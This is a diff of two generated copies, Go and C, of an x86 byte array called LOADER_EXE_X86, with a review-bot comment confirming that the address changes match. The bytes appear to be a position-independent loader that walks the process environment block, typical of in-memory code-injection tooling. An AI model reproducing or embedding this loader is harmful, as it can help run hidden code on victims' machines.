0x10, 0x00, 0x74, 0x10, 0xff, 0xd6, 0x8b, 0x54, 0x24, 0x14, 0x8b, 0xf0,
0x85, 0xf6, 0x0f, 0x84, 0x27, 0xff, 0xff, 0xff, 0xff, 0x36, 0x53, 0xe8,
0x67, 0xea, 0xff, 0xff, 0x8b, 0x54, 0x24, 0x1c, 0x59, 0x59, 0x85, 0xc0,
0x13, 0xea, 0xff, 0xff, 0x8b, 0x54, 0x24, 0x1c, 0x59, 0x59, 0x85, 0xc0,
0x0f, 0x84, 0x11, 0xff, 0xff, 0xff, 0x8b, 0x44, 0x24, 0x18, 0x8b, 0x40,
0x04, 0x8b, 0x54, 0x24, 0x14, 0x89, 0x06, 0xe9, 0xff, 0xfe, 0xff, 0xff,
0x8b, 0x3f, 0x8d, 0x83, 0x70, 0x03, 0x00, 0x00, 0x83, 0x7f, 0x18, 0x00,
@ -863,14 +870,14 @@ var LOADER_EXE_X86 = []byte{
0x8a, 0x01, 0x42, 0x88, 0x04, 0x0e, 0x41, 0x80, 0x39, 0x00, 0x75, 0xef,
0x8d, 0x44, 0x24, 0x60, 0xc6, 0x44, 0x14, 0x60, 0x00, 0x50, 0x8d, 0x44,
0x24, 0x24, 0x50, 0x57, 0xff, 0xb4, 0x24, 0xb0, 0x00, 0x00, 0x00, 0xe8,
0xd4, 0xe2, 0xff, 0xff, 0x83, 0xc4, 0x10, 0x8b, 0xf0, 0x8b, 0xc6, 0xeb,
0x80, 0xe2, 0xff, 0xff, 0x83, 0xc4, 0x10, 0x8b, 0xf0, 0x8b, 0xc6, 0xeb,
0x16, 0x8b, 0x84, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x2b, 0x43, 0x10, 0x8b,
0x34, 0x82, 0x03, 0xf7, 0xe9, 0x6e, 0xff, 0xff, 0xff, 0x33, 0xc0, 0x5f,
0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x90, 0x00, 0x00, 0x00, 0xc3, 0x55, 0x8b,
0xec, 0x64, 0xa1, 0x18, 0x00, 0x00, 0x00, 0x33, 0xc9, 0x56, 0x8b, 0x40,
0x30, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x0c, 0xeb, 0x20, 0x85, 0xc9, 0x75,
0x23, 0xff, 0x75, 0x18, 0xff, 0x75, 0x14, 0xff, 0x75, 0x10, 0xff, 0x75,
0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0xd5, 0xe0, 0xff, 0xff, 0x8b, 0x36,
0x0c, 0x50, 0xff, 0x75, 0x08, 0xe8, 0x81, 0xe0, 0xff, 0xff, 0x8b, 0x36,
0x83, 0xc4, 0x18, 0x8b, 0xc8, 0x8b, 0x46, 0x18, 0x85, 0xc0, 0x75, 0xd9,
0x8b, 0xc1, 0x5e, 0x5d, 0xc3, 0x83, 0xec, 0x14, 0x53, 0x8b, 0x5c, 0x24,
0x24, 0x33, 0xc0, 0x55, 0x56, 0x33, 0xed, 0x89, 0x44, 0x24, 0x0c, 0x57,



@ -4,17 +4,17 @@ unsigned char LOADER_EXE_X86[] = {
0xe4, 0x02, 0x00, 0x00, 0x33, 0xdb, 0x57, 0x8b, 0xfb, 0x39, 0x9e, 0x38,
0x02, 0x00, 0x00, 0x0f, 0x84, 0xea, 0x00, 0x00, 0x00, 0xff, 0x76, 0x2c,
0xff, 0x76, 0x28, 0xff, 0xb6, 0x8c, 0x00, 0x00, 0x00, 0xff, 0xb6, 0x88,
0x00, 0x00, 0x00, 0x56, 0xe8, 0x45, 0x28, 0x00, 0x00, 0x8b, 0xf8, 0x83,
0x00, 0x00, 0x00, 0x56, 0xe8, 0x99, 0x28, 0x00, 0x00, 0x8b, 0xf8, 0x83,
0xc4, 0x14, 0x85, 0xff, 0x0f, 0x84, 0xc0, 0x00, 0x00, 0x00, 0x53, 0x53,
0x56, 0xe8, 0x2d, 0x26, 0x00, 0x00, 0x8b, 0xc8, 0xb8, 0xd7, 0x22, 0x40,
0x00, 0x2d, 0x7b, 0x36, 0x40, 0x00, 0x03, 0xc8, 0x51, 0x53, 0x53, 0xff,
0x56, 0xe8, 0x81, 0x26, 0x00, 0x00, 0x8b, 0xc8, 0xb8, 0x2b, 0x23, 0x40,
0x00, 0x2d, 0xcf, 0x36, 0x40, 0x00, 0x03, 0xc8, 0x51, 0x53, 0x53, 0xff,
0xd7, 0xff, 0x76, 0x2c, 0x8b, 0xf8, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x0c,
0x02, 0x00, 0x00, 0xff, 0xb6, 0x08, 0x02, 0x00, 0x00, 0x56, 0xe8, 0x03,
0x02, 0x00, 0x00, 0xff, 0xb6, 0x08, 0x02, 0x00, 0x00, 0x56, 0xe8, 0x57,
0x28, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x89, 0x44, 0x24, 0x28, 0xff, 0x76,
0x28, 0xff, 0xb6, 0xa4, 0x00, 0x00, 0x00, 0xff, 0xb6, 0xa0, 0x00, 0x00,
0x00, 0x56, 0xe8, 0xe7, 0x27, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xd8,
0x00, 0x56, 0xe8, 0x3b, 0x28, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xd8,
0xff, 0x76, 0x28, 0xff, 0xb6, 0xac, 0x00, 0x00, 0x00, 0xff, 0xb6, 0xa8,
0x00, 0x00, 0x00, 0x56, 0xe8, 0xcd, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x3c,
0x00, 0x00, 0x00, 0x56, 0xe8, 0x21, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x3c,
0x8b, 0xe8, 0x6a, 0x00, 0xff, 0x56, 0x38, 0x83, 0x7c, 0x24, 0x10, 0x00,
0x89, 0x44, 0x24, 0x14, 0x74, 0x4c, 0x85, 0xdb, 0x74, 0x48, 0x85, 0xed,
0x74, 0x44, 0x8d, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x18, 0x07, 0x00,
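Review bot: the C header copy of the loader changes in lockstep with the Go array above, which is what a regenerated pair should look like, but both copies being hand-reviewed for sync is fragile and the build should emit them from one step. The evidence that they are in sync is in this hunk: the `0xb8, 0xd7, 0x22, 0x40, 0x00, 0x2d, 0x7b, 0x36, 0x40, 0x00` pair (mov eax, imm32 / sub eax, imm32) becomes `0xb8, 0x2b, 0x23, 0x40, 0x00, 0x2d, 0xcf, 0x36, 0x40, 0x00`, both absolute addresses moving by +0x54 so their difference, the position-independent delta the loader computes, is unchanged, and the forward call `0xe8, 0x45, 0x28` becomes `0xe8, 0x99, 0x28`, again +0x54. If the two files ever diverge the Go and C consumers would run different loaders, so a generated-file header line stating the source hash would be worth adding to both.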
@ -22,18 +22,18 @@ unsigned char LOADER_EXE_X86[] = {
0x00, 0x00, 0x03, 0x44, 0x24, 0x14, 0x83, 0xa4, 0x24, 0xdc, 0x00, 0x00,
0x00, 0xfc, 0x89, 0x84, 0x24, 0xd0, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
0x18, 0x6a, 0x00, 0x50, 0xff, 0x54, 0x24, 0x18, 0xeb, 0x0c, 0x83, 0xc8,
0xff, 0xeb, 0x09, 0x56, 0xe8, 0xc6, 0x11, 0x00, 0x00, 0x59, 0x8b, 0xc7,
0xff, 0xeb, 0x09, 0x56, 0xe8, 0x1a, 0x12, 0x00, 0x00, 0x59, 0x8b, 0xc7,
0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xd4, 0x02, 0x00, 0x00, 0xc3, 0x8b,
0x44, 0x24, 0x04, 0x83, 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2,
0x04, 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x56, 0x57,
0xe8, 0x3e, 0x25, 0x00, 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9, 0xad, 0x11,
0x40, 0x00, 0xbf, 0x7b, 0x36, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x01, 0xe8, 0x23, 0x25, 0x00, 0x00, 0xb9, 0x1f, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x04, 0xe8, 0x10,
0xe8, 0x92, 0x25, 0x00, 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9, 0xad, 0x11,
0x40, 0x00, 0xbf, 0xcf, 0x36, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x01, 0xe8, 0x77, 0x25, 0x00, 0x00, 0xb9, 0x1f, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x04, 0xe8, 0x64,
0x25, 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8, 0xfd, 0x24, 0x00, 0x00, 0xb9, 0x2e,
0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8, 0x51, 0x25, 0x00, 0x00, 0xb9, 0x2e,
0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c,
0xe8, 0xea, 0x24, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0xe8, 0x3e, 0x25, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x5f, 0x89, 0x41, 0x10, 0x8b, 0x44, 0x24, 0x08,
0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x08, 0x5e, 0xc3, 0x8b, 0x4c, 0x24,
0x0c, 0x85, 0xc9, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x4d,
@ -53,29 +53,29 @@ unsigned char LOADER_EXE_X86[] = {
0x83, 0xc6, 0x14, 0x56, 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37, 0x33,
0xc0, 0x5f, 0x5e, 0x5d, 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x8b,
0x40, 0x2c, 0xff, 0x50, 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01, 0x33,
0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0xf4, 0x23, 0x00, 0x00, 0x8b,
0x74, 0x24, 0x10, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0xbf, 0x7b, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0xd9, 0x23,
0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0x48, 0x24, 0x00, 0x00, 0x8b,
0x74, 0x24, 0x10, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0xbf, 0xcf, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0x2d, 0x24,
0x00, 0x00, 0xb9, 0x1f, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0xc6, 0x23, 0x00, 0x00, 0xb9, 0x0c, 0x12,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0x1a, 0x24, 0x00, 0x00, 0xb9, 0x0c, 0x12,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8,
0xb3, 0x23, 0x00, 0x00, 0xb9, 0x6b, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0xa0, 0x23, 0x00, 0x00, 0xb9,
0x07, 0x24, 0x00, 0x00, 0xb9, 0x6b, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0xf4, 0x23, 0x00, 0x00, 0xb9,
0x21, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x10, 0xe8, 0x8d, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0x7a, 0x23, 0x00,
0x10, 0xe8, 0xe1, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0xce, 0x23, 0x00,
0x00, 0xb9, 0xb9, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e,
0x89, 0x41, 0x18, 0xe8, 0x67, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0x54,
0x89, 0x41, 0x18, 0xe8, 0xbb, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0xa8,
0x23, 0x00, 0x00, 0xb9, 0x6e, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0x41, 0x23, 0x00, 0x00, 0xb9, 0x69,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0x95, 0x23, 0x00, 0x00, 0xb9, 0x69,
0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x24,
0xe8, 0x2e, 0x23, 0x00, 0x00, 0xb9, 0x69, 0x13, 0x40, 0x00, 0x2b, 0xcf,
0xe8, 0x82, 0x23, 0x00, 0x00, 0xb9, 0x69, 0x13, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x5f, 0x89, 0x41, 0x28, 0x8b, 0x44, 0x24, 0x08,
0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x2c, 0x5e, 0xc3, 0x33, 0xc0, 0xc2,
0x04, 0x00, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56, 0x6a,
0x20, 0x50, 0x89, 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc, 0x8d,
0x45, 0xd4, 0x50, 0xe8, 0x8b, 0x29, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0x8d,
0x45, 0xd4, 0x50, 0xe8, 0xdf, 0x29, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0x8d,
0x4d, 0xd4, 0x83, 0xc4, 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50, 0x0c,
0x85, 0xc0, 0x75, 0x12, 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d, 0x4d,
0xf8, 0x51, 0x8d, 0x4d, 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33, 0xc0,
@ -95,38 +95,38 @@ unsigned char LOADER_EXE_X86[] = {
0x08, 0xc3, 0x8b, 0x44, 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2,
0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51,
0x53, 0x56, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x54, 0x03, 0x00, 0x00,
0x50, 0x56, 0xe8, 0x0a, 0x22, 0x00, 0x00, 0x8b, 0xd8, 0x59, 0x59, 0x85,
0x50, 0x56, 0xe8, 0x5e, 0x22, 0x00, 0x00, 0x8b, 0xd8, 0x59, 0x59, 0x85,
0xdb, 0x75, 0x06, 0x40, 0xe9, 0xd5, 0x00, 0x00, 0x00, 0x55, 0x57, 0x6a,
0x00, 0x8d, 0x86, 0xc8, 0x05, 0x00, 0x00, 0x50, 0x53, 0x56, 0xe8, 0x88,
0x00, 0x8d, 0x86, 0xc8, 0x05, 0x00, 0x00, 0x50, 0x53, 0x56, 0xe8, 0xdc,
0x22, 0x00, 0x00, 0x8b, 0xe8, 0x83, 0xc4, 0x10, 0x85, 0xed, 0x0f, 0x84,
0xb2, 0x00, 0x00, 0x00, 0xbf, 0x48, 0x14, 0x40, 0x00, 0x81, 0xef, 0x3c,
0x14, 0x40, 0x00, 0x0f, 0x88, 0xa1, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
0x18, 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f,
0x84, 0x8d, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xa8, 0x21, 0x00, 0x00, 0xb9,
0x3c, 0x14, 0x40, 0x00, 0x81, 0xe9, 0x7b, 0x36, 0x40, 0x00, 0x03, 0xc1,
0x50, 0x55, 0xe8, 0x0c, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
0x84, 0x8d, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xfc, 0x21, 0x00, 0x00, 0xb9,
0x3c, 0x14, 0x40, 0x00, 0x81, 0xe9, 0xcf, 0x36, 0x40, 0x00, 0x03, 0xc1,
0x50, 0x55, 0xe8, 0x60, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
0x24, 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48,
0x6a, 0x00, 0x8d, 0x86, 0xd8, 0x05, 0x00, 0x00, 0x50, 0x53, 0x56, 0xe8,
0x1b, 0x22, 0x00, 0x00, 0x8b, 0xe8, 0x83, 0xc4, 0x10, 0x85, 0xed, 0x74,
0x6f, 0x22, 0x00, 0x00, 0x8b, 0xe8, 0x83, 0xc4, 0x10, 0x85, 0xed, 0x74,
0x49, 0xbf, 0x5e, 0x14, 0x40, 0x00, 0xbb, 0x52, 0x14, 0x40, 0x00, 0x2b,
0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57, 0x55,
0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x46, 0x21, 0x00,
0x00, 0x81, 0xeb, 0x7b, 0x36, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, 0xe8,
0xaf, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x9a, 0x21, 0x00,
0x00, 0x81, 0xeb, 0xcf, 0x36, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, 0xe8,
0x03, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0, 0x40,
0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x55, 0x8b,
0xec, 0x51, 0x56, 0x8b, 0x75, 0x08, 0x57, 0x8d, 0x86, 0x68, 0x03, 0x00,
0x00, 0x50, 0x56, 0xe8, 0x0d, 0x21, 0x00, 0x00, 0x6a, 0x00, 0x8d, 0x8e,
0xe8, 0x05, 0x00, 0x00, 0x51, 0x50, 0x56, 0xe8, 0x9b, 0x21, 0x00, 0x00,
0x00, 0x50, 0x56, 0xe8, 0x61, 0x21, 0x00, 0x00, 0x6a, 0x00, 0x8d, 0x8e,
0xe8, 0x05, 0x00, 0x00, 0x51, 0x50, 0x56, 0xe8, 0xef, 0x21, 0x00, 0x00,
0x8b, 0xf8, 0x83, 0xc4, 0x18, 0x85, 0xff, 0x74, 0x34, 0x8d, 0x45, 0x08,
0x50, 0x6a, 0x40, 0x6a, 0x04, 0x57, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74,
0x24, 0x6a, 0x04, 0x8d, 0x86, 0x0d, 0x06, 0x00, 0x00, 0x50, 0x57, 0xe8,
0x43, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x45, 0xfc, 0x50, 0xff,
0x97, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x45, 0xfc, 0x50, 0xff,
0x75, 0x08, 0x6a, 0x04, 0x57, 0xff, 0x56, 0x48, 0x33, 0xc0, 0x40, 0xeb,
0x02, 0x33, 0xc0, 0x5f, 0x5e, 0xc9, 0xc3, 0x81, 0xec, 0xec, 0x02, 0x00,
0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0xfc, 0x02, 0x00, 0x00, 0x8d,
0x44, 0x24, 0x34, 0x57, 0x6a, 0x3c, 0x33, 0xed, 0x33, 0xdb, 0x21, 0x5c,
0x24, 0x24, 0xbf, 0x00, 0x03, 0x60, 0x04, 0x55, 0x50, 0xe8, 0x21, 0x27,
0x24, 0x24, 0xbf, 0x00, 0x03, 0x60, 0x04, 0x55, 0x50, 0xe8, 0x75, 0x27,
0x00, 0x00, 0x83, 0xc4, 0x0c, 0xc7, 0x44, 0x24, 0x38, 0x3c, 0x00, 0x00,
0x00, 0x8d, 0x84, 0x24, 0xf8, 0x01, 0x00, 0x00, 0xb9, 0x04, 0x01, 0x00,
0x00, 0x89, 0x44, 0x24, 0x48, 0x8d, 0x84, 0x24, 0xf4, 0x00, 0x00, 0x00,
@ -188,9 +188,9 @@ unsigned char LOADER_EXE_X86[] = {
0x89, 0x44, 0x24, 0x18, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74, 0x4e, 0x6a,
0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x74, 0x24, 0x18, 0x6a, 0x00,
0xff, 0x56, 0x3c, 0x89, 0x86, 0x60, 0x0d, 0x00, 0x00, 0x85, 0xc0, 0x74,
0x13, 0xff, 0x74, 0x24, 0x10, 0x53, 0x50, 0xe8, 0x17, 0x24, 0x00, 0x00,
0x13, 0xff, 0x74, 0x24, 0x10, 0x53, 0x50, 0xe8, 0x6b, 0x24, 0x00, 0x00,
0x33, 0xed, 0x83, 0xc4, 0x0c, 0x45, 0xeb, 0x02, 0x33, 0xed, 0xff, 0x74,
0x24, 0x10, 0x6a, 0x00, 0x53, 0xe8, 0x25, 0x24, 0x00, 0x00, 0x8b, 0x44,
0x24, 0x10, 0x6a, 0x00, 0x53, 0xe8, 0x79, 0x24, 0x00, 0x00, 0x8b, 0x44,
0x24, 0x24, 0x83, 0xc4, 0x0c, 0x53, 0x6a, 0x01, 0xff, 0x10, 0x50, 0xff,
0x96, 0x88, 0x00, 0x00, 0x00, 0x57, 0xff, 0x96, 0xd0, 0x00, 0x00, 0x00,
0xff, 0x74, 0x24, 0x30, 0xff, 0x96, 0xd0, 0x00, 0x00, 0x00, 0xff, 0x74,
@ -198,8 +198,8 @@ unsigned char LOADER_EXE_X86[] = {
0x83, 0xbe, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x45, 0xff, 0xb6, 0x58,
0x0d, 0x00, 0x00, 0x8b, 0xbe, 0x60, 0x0d, 0x00, 0x00, 0x8d, 0x86, 0x48,
0x0d, 0x00, 0x00, 0x57, 0x50, 0x8d, 0x86, 0x38, 0x0d, 0x00, 0x00, 0x50,
0xe8, 0x9e, 0x20, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x2c, 0x0c,
0x00, 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0x62, 0x1f, 0x00, 0x00, 0x83,
0xe8, 0xf2, 0x20, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x2c, 0x0c,
0x00, 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0xb6, 0x1f, 0x00, 0x00, 0x83,
0xc4, 0x1c, 0x3b, 0x87, 0x18, 0x05, 0x00, 0x00, 0x75, 0x0c, 0x3b, 0x97,
0x1c, 0x05, 0x00, 0x00, 0x75, 0x04, 0x8b, 0xc5, 0xeb, 0x02, 0x33, 0xc0,
0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xec, 0x02, 0x00, 0x00, 0xc3, 0x81,
@ -216,11 +216,11 @@ unsigned char LOADER_EXE_X86[] = {
0x8b, 0xb4, 0x24, 0xf4, 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10, 0xff,
0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00, 0x00,
0x00, 0xc6, 0x84, 0x14, 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24,
0x04, 0x02, 0x00, 0x00, 0x50, 0xe8, 0x97, 0x1e, 0x00, 0x00, 0x89, 0x44,
0x04, 0x02, 0x00, 0x00, 0x50, 0xe8, 0xeb, 0x1e, 0x00, 0x00, 0x89, 0x44,
0x24, 0x24, 0x83, 0xc4, 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0, 0xfc,
0x89, 0x54, 0x24, 0x1c, 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10, 0xff,
0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24, 0x04,
0x02, 0x00, 0x00, 0x03, 0xce, 0x51, 0xe8, 0x66, 0x1e, 0x00, 0x00, 0x33,
0x02, 0x00, 0x00, 0x03, 0xce, 0x51, 0xe8, 0xba, 0x1e, 0x00, 0x00, 0x33,
0x44, 0x24, 0x24, 0x83, 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b, 0x84,
0x24, 0xf8, 0x01, 0x00, 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc, 0x01,
0x00, 0x00, 0x74, 0x1d, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04, 0x89,
@ -242,9 +242,9 @@ unsigned char LOADER_EXE_X86[] = {
0x56, 0x57, 0x8b, 0x40, 0x30, 0x8b, 0x7d, 0x08, 0x8b, 0x40, 0x0c, 0x8b,
0x70, 0x0c, 0x39, 0x4e, 0x18, 0x74, 0x2a, 0x8b, 0x5d, 0x0c, 0x85, 0xc9,
0x75, 0x3f, 0x39, 0x5e, 0x18, 0x74, 0x12, 0x51, 0xff, 0x75, 0x14, 0xff,
0x76, 0x18, 0x57, 0xe8, 0xc3, 0x1b, 0x00, 0x00, 0x83, 0xc4, 0x10, 0x8b,
0x76, 0x18, 0x57, 0xe8, 0x17, 0x1c, 0x00, 0x00, 0x83, 0xc4, 0x10, 0x8b,
0xc8, 0x8b, 0x36, 0x83, 0x7e, 0x18, 0x00, 0x75, 0xdd, 0x85, 0xc9, 0x75,
0x1c, 0xff, 0x75, 0x10, 0x57, 0xe8, 0x0b, 0x1b, 0x00, 0x00, 0x59, 0x59,
0x1c, 0xff, 0x75, 0x10, 0x57, 0xe8, 0x5f, 0x1b, 0x00, 0x00, 0x59, 0x59,
0x85, 0xc0, 0x74, 0x0b, 0xff, 0x75, 0x14, 0x50, 0xff, 0x57, 0x34, 0x8b,
0xc8, 0xeb, 0x02, 0x33, 0xc9, 0x5f, 0x5e, 0x8b, 0xc1, 0x5b, 0x5d, 0xc3,
0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x33, 0xff, 0x8b, 0x4e, 0x18, 0x85,
@ -275,57 +275,57 @@ unsigned char LOADER_EXE_X86[] = {
0x45, 0x08, 0xff, 0x75, 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff,
0x75, 0x1c, 0xff, 0x75, 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51,
0xff, 0x52, 0x2c, 0x5d, 0xc2, 0x24, 0x00, 0x55, 0x8b, 0xec, 0x81, 0xec,
0x04, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0xe8, 0x8b, 0x19, 0x00, 0x00,
0x8b, 0x75, 0x0c, 0xb9, 0x7a, 0x1f, 0x40, 0x00, 0xbf, 0x7b, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0x71, 0x19,
0x04, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0xe8, 0xdf, 0x19, 0x00, 0x00,
0x8b, 0x75, 0x0c, 0xb9, 0x7a, 0x1f, 0x40, 0x00, 0xbf, 0xcf, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0xc5, 0x19,
0x00, 0x00, 0xb9, 0x32, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0x5e, 0x19, 0x00, 0x00, 0xb9, 0x03, 0x20,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0xb2, 0x19, 0x00, 0x00, 0xb9, 0x03, 0x20,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8,
